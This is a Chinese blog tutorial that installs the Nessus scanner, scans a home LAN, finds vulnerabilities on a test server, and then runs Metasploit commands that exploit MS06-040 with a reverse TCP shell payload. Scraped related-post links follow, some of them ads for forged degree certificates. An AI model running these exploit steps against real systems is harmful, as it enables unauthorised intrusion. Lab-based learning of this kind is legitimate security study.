0x 00 前言

  写这篇博客,证明我还活着……

  

0x 01 安装Nessus 

  直接官网  www.tenable.com/products/nessus/select-your-operating-system

  选择Nessus Home版下载,下载之后点击安装我这里是Nessus-6.1.0-x64版(附件处有百度网盘链接)

  安装开始设置一个用户名和密码(记住,使用Nessus时会验证)

  然后选择文件安装目录

  之后会提示更新插件,这个要通过官网注册获取激活码来更新的

  我们在官网 www.tenable.com/products/nessus/evaluate注册账户,打开注册邮箱就可以收到激活码了~

  注意:注册邮箱不能使用 qq\163\gmail\hotmail 等公共邮箱,要用企业邮箱才可以

  在这里推荐使用“一小时邮箱”进行注册,具体使用方法问度娘吧

  填好激活码之后,插件自动更新,我这里5分钟左右就更新好了

0x 02  软件使用

    浏览器打开  https://localhost:8834   后显示客户端界面

    输入先前设置的用户名密码登录

  1. 扫描局域网存活主机

    点击“New Scan”,

    在提供的默认模版里选择一个模版,这里选择“Host Discovery”,

    在弹出的通用配置里设置“Name”(本次扫描的名字),“Target”(扫描目标)

    我扫的是192.168.1.1全网段的 ,看图

     

    之后“点击保存”后会进行自动扫描

    2分钟之后结果就来了,在这里

      

    看到了米有,9个主机在线,测试结果与真实环境相同的

    NMAP也能完成主机探测我会乱说,所以说Nessus牛的地方不是在这,所以下面来了

  2. 主机扫描

    我在本地搭了个低版本服务器,IP为192.168.1.112

    新建扫描,设置扫描策略为“Advanced Scan”,

    然后 “Target”填上192.168.1.112

    因为扫的是同个局域网内的速度还是比较快的,结果倒是让我惊呆了Orz...

    

    20个紧急漏洞,8个高危漏洞,醉了有木有 = =  速度戳之

    

    上面MSxx-xxx是微软漏洞编码,随随便便选择一个找到Exp就可以愉悦的玩耍了  ~~

    接下来漏洞结合MSF进行漏洞利用~

    当然,直接根据漏洞的编码百度一下利用方法也是可以的,这里就直接用BT5吧

    找一个比较老的洞:ms06-040

    BT5 的 CMD 输入 msfconsole 进入MSF欢迎界面(时间略长,等下就OK了)

    我们按照MSF的一般执行过程来操作(选择模版—设置PAYLOAD—设置参数—攻击)

search ms06_040        // 查找ms06_040相关漏洞模块

    找到对应模块后

use exploit/windows/smb/ms06_040_netapi  // 使用ms06_040_netapi模块
show options // 查看漏洞配置信息
set PAYLOAD windows/shell/reverse_tcp // 设置PAYLOAD
set RHOST 192.168.1.112 // 目标IP
set LHOST 192.168.1.117 // 本机IP
// 端口号 和 目标类型 默认就OK了
exploit // 进行攻击

    然后看拿到拿到了神马……

    

附件:

  Nessus-6.1.0-x64  百度网盘:pan.baidu.com/s/1hq48j20     9fgu

  

『安全工具』Nessus多功能扫描器的更多相关文章

  1. 『安全工具』Nmap 强悍的端口扫描工具

    作为时下流行的端口扫描工具,Nmap有因其扫描的隐密性有“端口扫描之王”之称 上图是黑客帝国(The Matrix)中崔妮蒂用Nmap入侵核发电站的能源管理系统 0x 01 Nmap介绍 Nmap是一 ...

  2. 『安全工具』目录扫描 DirBuster AND 御剑

    要想熟悉目标网站的体系架构,知道网站有哪些目录是必不可少的 向AWVS,Burp类大型扫描工具也可以进行目录扫描,不过个人感觉远没有专业扫描工具来的简单,实在 0x 01 DirBuster 简介:D ...

  3. 『安全工具』注入神器SQLMAP

    Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLM ...

  4. 『 效率工具 』Spring Boot版的轻量级代码生成器,减少70%以上的开发任务

    一. 前言 之前很着迷于代码自动生成,减少写重复代码的工作量.网络上也搜索了很久,有基于插件的,有GUI的.但其配置和学习成本都比较高,都不是很如我意. 本想自己用SpringBoot写一个,在收集相 ...

  5. 『在线工具』 基于 xsser.me 源码 + BootStrap 前端 的 XSS 平台

    乌云社区上一个小伙伴的对xsser.me 的源码做了 BS 的优化,本人已经搭建好,提供给大家免费使用,大牛求绕过,多谢. 地址: http://xss.evilclay.com (目前开放注册,不需 ...

  6. 『开发技巧』Python音频操作工具PyAudio上手教程

    『开发技巧』Python音频操作工具PyAudio上手教程 ​ 0.引子 当需要使用Python处理音频数据时,使用python读取与播放声音必不可少,下面介绍一个好用的处理音频PyAudio工具包. ...

  7. Github 恶搞教程(一起『玩坏』自己的 Github 吧)

    最近在伯乐在线读到一篇趣文,<如何在 Github『正确』做贡献>,里面各种能人恶搞 Github 的『Public contributions』,下面截取几个小伙伴的战绩: 顺藤摸瓜,发 ...

  8. 办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary

    办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...

  9. 办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta

    办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...

随机推荐

  1. 链接器(linker)的作用——CSAPP第7章读书笔记

    首先说说我为什么要去读这一章.这个学期开OS的课,在Morden Operating System上读到和Process有关的内容时看到这样一句话:“Process is fundamentally ...

  2. POJ 3669 广度优先搜索

    题意:巨大流星雨即将袭来.每个流星会对击中的地方以及周围(上下左右四格)造成破坏.Bessie开始时位于(0, 0)位置,并希望逃到一处不会被袭击到的地方(在第一象限内).已知每移动一格需要1个时间单 ...

  3. C++ Template Specialization (模板特化)

    个人理解这个东西说白了就是当模板类(或函数)的类型参数为某特定值时用对应的特化定义代之. 看个例子吧 #include <iostream> using namespace std; te ...

  4. hyperVisors

    容器有效地将由单个操作系统管理的资源划分到孤立的组中,以更好地在孤立的组之间平衡有冲突的资源使用需求 期望继续进军中国市场 就像IBM公司,惠普公司和戴尔公司在中国服务器市场的霸主地位一样,Inspu ...

  5. puppet report import

    把Puppet报告导入Puppet Dashboard 现在Dashboard正在运行,而我们需要确保它能够获取Puppet报告.完成这项工作有几种方法,开始的时候都是用Rake任务导入旧报告.在/u ...

  6. Oracle执行计划——使用index full scan的几种情况

    常见有三种情况都有用到indexfull scan. 1. 查询列就是索引列 2. 对索引列进行order by时 3. 对索列进行聚合计算时

  7. JS 实现显示和隐藏div(以百度地图为例)

    主要参考的文章:https://my.oschina.net/xsh1208/blog/215811,https://zhidao.baidu.com/question/568774688.html ...

  8. Javascript 第一阶段 学习使用总结

    JavaScript 是一种轻量级的编程语言.JavaScript 是可插入 HTML 页面的编程代码.脚本可被放置在 HTML 页面的 <body> 和 <head> 部分中 ...

  9. 字符串格式化 String.format() 案例

    转换符 转换符      说    明 %s            字符串类型 %c            字符类型 %b            布尔类型 %d            整数类型(十进制 ...

  10. Js打开新窗口拦截问题整理

    一.js打开新窗口,经常被拦截 //js打开新窗口,经常被拦截 //指定本窗口打开,可以使用 window.open('http://www.tianma3798.cn', '_self'); //不 ...